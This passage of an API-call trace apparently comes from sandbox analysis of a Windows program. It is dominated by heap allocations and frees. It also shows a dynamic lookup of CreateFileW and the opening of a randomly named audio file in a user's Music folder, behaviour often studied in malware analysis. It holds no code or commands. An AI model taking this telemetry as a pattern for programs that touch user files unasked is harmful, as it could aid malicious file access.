hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0117.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0117.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0117.406] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.407] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.407] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.408] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0117.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0117.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cac58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.409] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\ymtk.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9bf0 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7710 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0117.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.412] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | 